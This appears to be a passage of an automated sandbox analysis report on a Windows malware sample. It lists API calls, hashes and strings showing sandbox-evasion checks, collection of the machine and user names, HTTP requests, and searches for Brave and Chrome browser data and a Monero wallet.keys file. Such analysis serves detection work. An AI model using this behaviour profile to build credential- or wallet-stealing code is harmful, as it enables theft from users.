                                • Opcode Fuzzy Hash: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                                • Instruction Fuzzy Hash: 41F08CB0A44219AFE740ABA0DC0AFBE7B78FB85701F104914F517E21C1CFB05980DAA7

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: fb859dbc2477604033ffaf3f2460f261acf8b757a1339740bcd3f5db3789c45c
                                • Instruction ID: 9b76c2bd867db32b9db695e5e5362de0157164c850060214fe2c21e3edf59616
                                • Opcode Fuzzy Hash: fb859dbc2477604033ffaf3f2460f261acf8b757a1339740bcd3f5db3789c45c
                                • Instruction Fuzzy Hash: E8214FB1D00208ABDF14DFA4E845BDD7B75FB44320F108625F919A72D0DB706A05CF92

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                  • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,015BFC50), ref: 00936303
                                  • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                  • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,015BF098,00000000,00000000,00400100,00000000), ref: 00936385
                                  • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                  • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
                                • Instruction ID: 59dfec1067963076c170827c5bec08f89c48f6de136ff51b5f27038e3c085a26
                                • Opcode Fuzzy Hash: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
                                • Instruction Fuzzy Hash: 3311FE30954148ABEB14FFB4DD52FED7339AF90304F404558F81A5B592EF74AB05CA92

                                Control-flow Graph

                                • Rendered graph not reproduced; it covers the basic blocks 931220-93129d of this function (calls to GlobalMemoryStatusEx and ExitProcess)
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                                • ExitProcess.KERNEL32 ref: 00931294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                                • Instruction ID: 463eba9c32cc48e7169ca00852a71cca200f6cb717b0b7fc970ebd5685d215a5
                                • Opcode Fuzzy Hash: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                                • Instruction Fuzzy Hash: AF011DB0D44308BBEB10EFE4CC49F9EBB78AB54705F208049E709B62D0DB7459458B99
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                                • ExitProcess.KERNEL32 ref: 00931143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                                • Instruction ID: bead969e56557794c731b591a9bb60568cd525602bc9698c328cb8202172a78c
                                • Opcode Fuzzy Hash: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                                • Instruction Fuzzy Hash: 2CE0E670949308FBE7546BA09D0AB4D7678AB44B02F104154F70D771D0DAB52A419A9A
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009310B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009310F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                                • Instruction ID: 5dca9fdf59d64c67696f6ee4f5887d58a550bb4bba7be8d3dc71b27ab5701e44
                                • Opcode Fuzzy Hash: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                                • Instruction Fuzzy Hash: B4F0E2B1641208BBE7189AA4AC59FAFB7ECE705B15F300848F504E7290D9719F40CAA1
                                APIs
                                  • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                  • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                  • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                  • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                  • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                  • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                • ExitProcess.KERNEL32 ref: 009311C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                                • Instruction ID: 5b2c2f9dee3526044eebb7e959109a0423212101a18a083f4f896e0a902c79ef
                                • Opcode Fuzzy Hash: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                                • Instruction Fuzzy Hash: 1AE017B991830553CA4477F0AC8BF2F369C5B9474AF040828FA09D3212FE65E8408A6A
                                APIs
                                • wsprintfA.USER32 ref: 009438CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 009438E3
                                • lstrcat.KERNEL32(?,?), ref: 00943935
                                • StrCmpCA.SHLWAPI(?,00950F70), ref: 00943947
                                • StrCmpCA.SHLWAPI(?,00950F74), ref: 0094395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00943C67
                                • FindClose.KERNEL32(000000FF), ref: 00943C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                                • Instruction ID: 8af562d82ad61dd9c9b84dbf0f8a5beef6f18036d4d1898a9a8019a70e488474
                                • Opcode Fuzzy Hash: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                                • Instruction Fuzzy Hash: F3A111B1A00218ABDB64EFA4DC85FEE7379BB84301F048588B95D97141EB759B84CF62
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00950B32,00950B2B,00000000,?,?,?,009513F4,00950B2A), ref: 0093BEF5
                                • StrCmpCA.SHLWAPI(?,009513F8), ref: 0093BF4D
                                • StrCmpCA.SHLWAPI(?,009513FC), ref: 0093BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093C7BF
                                • FindClose.KERNEL32(000000FF), ref: 0093C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                                • Instruction ID: ff7bda6e7b9fe4b4c13dcbe5a24ab4b5d624dd29f82e1fd4c0260ad778ba0333
                                • Opcode Fuzzy Hash: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                                • Instruction Fuzzy Hash: E6425072950104ABEB14FB70DD96FEE737DABC4304F404558B90AA7191EE34AB49CFA2
                                APIs
                                • wsprintfA.USER32 ref: 0094492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00944943
                                • StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                • StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                • FindClose.KERNEL32(000000FF), ref: 00944B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                                • Instruction ID: b75513e1704713cf8d4b8524e603094fd6c09e860b089f476d4f7866636f0df6
                                • Opcode Fuzzy Hash: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                                • Instruction Fuzzy Hash: 546101B2900218ABCB64EBA0DC45FEE737CBBC8705F044598B50D96151EE75EB89CF92
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                                • wsprintfA.USER32 ref: 009445A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                                • StrCmpCA.SHLWAPI(?,00950FC4), ref: 009445EB
                                • StrCmpCA.SHLWAPI(?,00950FC8), ref: 00944601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0094468B
                                • FindClose.KERNEL32(000000FF), ref: 009446A0
                                • lstrcat.KERNEL32(?,015BFAD0), ref: 009446C5
                                • lstrcat.KERNEL32(?,015BEAB0), ref: 009446D8
                                • lstrlen.KERNEL32(?), ref: 009446E5
                                • lstrlen.KERNEL32(?), ref: 009446F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                                • Instruction ID: a3ea04865d1a8775717acebcbb0d755b82b693f5a6bae8c627101b890dd8dbfb
                                • Opcode Fuzzy Hash: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                                • Instruction Fuzzy Hash: 855134B2550218ABC764EB70DC89FED737CAB98701F404588F60D97190EF749B858F92
                                APIs
                                • wsprintfA.USER32 ref: 00943EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00943EDA
                                • StrCmpCA.SHLWAPI(?,00950FAC), ref: 00943F08
                                • StrCmpCA.SHLWAPI(?,00950FB0), ref: 00943F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0094406C
                                • FindClose.KERNEL32(000000FF), ref: 00944081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                                • Instruction ID: 716d7f364e542b293e518b088a042c520d22bde7c2704b40cc3adc2a37f0f6a0
                                • Opcode Fuzzy Hash: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                                • Instruction Fuzzy Hash: A95113B2900218ABCB24EBB0DC85FEE737CBBD4304F404588B65D96151EF75AB898F91
                                APIs
                                • wsprintfA.USER32 ref: 0093ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 0093ED55
                                • StrCmpCA.SHLWAPI(?,00951538), ref: 0093EDAB
                                • StrCmpCA.SHLWAPI(?,0095153C), ref: 0093EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093F2AE
                                • FindClose.KERNEL32(000000FF), ref: 0093F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                                • Instruction ID: c1bc3b5fd5c4d88c95ce331c0a0ddd6713bcac0c0c49da5cba9c7e3adda84f7a
                                • Opcode Fuzzy Hash: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                                • Instruction Fuzzy Hash: 59E1CF72951118AAEB54FB60DC52FEE7338EFD4304F404599B50A62192EF306F8ACF56
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
